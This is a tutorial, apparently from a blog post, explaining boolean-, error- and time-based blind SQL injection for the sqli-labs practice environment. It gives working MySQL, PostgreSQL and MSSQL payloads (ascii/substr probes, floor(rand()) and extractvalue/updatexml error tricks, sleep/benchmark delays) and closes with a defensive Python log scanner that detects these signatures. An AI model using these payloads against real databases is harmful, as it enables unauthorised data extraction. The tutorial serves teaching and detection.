sqli-labs: Explanation of blind SQL injection

Blind injection

What is blind injection? In a blind SQL injection, the data selected by the injected SQL statement is not echoed to the front-end page. We therefore have to infer it indirectly, by making judgments or trial queries; this process is called blind injection.
There are three types of blind injection:

• Boolean-based blind SQL injection

• Time-based blind SQL injection

• Error-based blind SQL injection

1. Boolean-based blind SQL injection: constructing logical judgments

We can use logical judgment to

Analysis of the string-interception functions: http://blog.csdn.net/Fly_hps/article/details/80245853

left() function

left(database(),1)>'s'

Description: database() returns the current database name, and left(a,b) takes the first b characters of a from the left so they can be compared.

ascii() function

ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+

Description: substr(a,b,c) returns c characters of string a starting at position b. ascii() converts a character to its ASCII value.

ord() function

ord(mid((select ifnull(cast(username AS CHAR),0x20) from security.users order by id limit 0,1),1,1))>98

Description: mid(a,b,c) returns c characters of string a starting at position b.

The ord() function, like ascii(), converts a character to its ASCII value, which is then used in the comparison.

regexp (regular expression) injection

Introduction to regexp injection: https://blog.csdn.net/Fly_hps/article/details/80246278

like pattern-matching injection

Similar to regexp above, MySQL's like operator can be used for pattern matching.
Usage: select user() like 'ro%'


2. Error-based blind SQL injection: construct a payload so that information is echoed through the error message
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;
Explanation: there are three points here.
First, concat and count are required.
Second, floor(rand(0)*2) yields 0 or 1, producing duplicate values.
Third, group by performs the grouping.

However, the explanation of the exact principle is not very clear. Roughly, the error is caused by a duplicate key when the rows are counted after grouping; it has also been explained as a bug in MySQL. Here you may need to try rand(0) and rand() several times.
The above statement can be simplified to the following form:

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

This form can be used if the critical tables are not accessible:

select count(*) from (select 1 union select null union select !1)a group by concat(version(),floor(rand(0)*2))

If rand() is disabled, user variables can be used to trigger the error instead:

select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

extractvalue()

extractvalue(1,concat(0x7e,(select @@version),0x7e))

extractvalue() is MySQL's XPath function for querying XML data; when the XPath expression is syntactically invalid, the error message echoes it.
Reference article: https://blog.csdn.net/Fly_hps/article/details/79416728

updatexml()

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

updatexml() is MySQL's XPath function for modifying XML data; again, an invalid XPath expression is echoed in the error message.
refer to the article: https://blog.csdn.net/Fly_hps/article/details/79416842

3. Time-based blind injection

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23

Description: an if() statement; when the condition is false, sleep() is executed.

The following delay-injection statement using sleep() is also encountered:

select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));

This statement finds the first digit of the version number among 0-9. However, in actual penetration testing this usage is not advisable, because the measured time is affected by other factors such as network speed, which affects the judgment of the result.

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM (select database() as current) as tb1;
BENCHMARK(count, expr) is used to test the performance of a function: the first parameter is the number of repetitions and the second is the expression to execute.

The expression is executed many times, so the response takes longer than usual. From the change in elapsed time it can be judged whether the statement executed successfully. This is a side-channel attack that consumes a lot of CPU resources while running, so the sleep() function is recommended for injection instead.

MySQL

BENCHMARK(100000,MD5(1))  or sleep(5)

PostgreSQL

PG_SLEEP(5)   OR GENERATE_SERIES(1,10000)

MS SQL Server

WAITFOR DELAY '0:0:5'
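As an added defensive example (not part of the original post): a small Python scanner that flags the three blind-injection signature families described above (boolean, error-based and time-based) in web-server access logs. It assumes the common "combined" log format; the sample log lines are constructed for the demonstration and do not come from the page.

```python
import re
from urllib.parse import unquote_plus

# Signature families mirroring the three blind-injection classes on this page; patterns run against the lower-cased, URL-decoded request.
SIGNATURES = {
    "boolean": [
        r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid|left)\s*\(",  # ascii(substr(...)), ord(mid(...))
        r"\bleft\s*\(\s*database\s*\(\)",                              # left(database(),1)>'s'
    ],
    "error": [
        r"\bextractvalue\s*\(", r"\bupdatexml\s*\(",
        r"\bfloor\s*\(\s*rand\s*\(",                                   # floor(rand(0)*2) duplicate-key trick
    ],
    "time": [
        r"\bsleep\s*\(", r"\bbenchmark\s*\(", r"\bpg_sleep\s*\(",
        r"\bgenerate_series\s*\(", r"\bwaitfor\s+delay\b",
    ],
}

# Combined-format access-log line: client, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(raw_request):
    """Return the set of blind-injection families whose signatures appear in a request."""
    decoded = unquote_plus(raw_request).lower()  # %27 -> ', %3E -> >, '+' -> space (so --+ becomes '-- ')
    return {family for family, patterns in SIGNATURES.items()
            if any(re.search(p, decoded) for p in patterns)}

def scan_log(lines):
    """Return (client, status, families) for every log line carrying a blind-injection signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:  # ignore lines that are not in combined format
            families = classify(m.group("path"))
            if families:
                hits.append((m.group("ip"), m.group("status"), sorted(families)))
    return hits

# Constructed sample log lines (not from the original page): boolean, boolean+time, error, benign.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /article.php?id=1%27%20and%20ascii(substr(database(),1,1))%3E115--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /article.php?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E115,0,sleep(5))%23 HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Oct/2023:13:55:38 +0000] "GET /article.php?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e))--+ HTTP/1.1" 500 301',
    '10.0.0.9 - - [10/Oct/2023:13:55:39 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, status, families in scan_log(LOG_LINES):
        print(f"{client} status={status} families={','.join(families)}")
```

The second sample line matches both the boolean and time families, which is the usual pattern for the if(...,sleep()) payload shown in this section; a real deployment would feed the scanner the actual log file and alert on repeated hits from one client.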
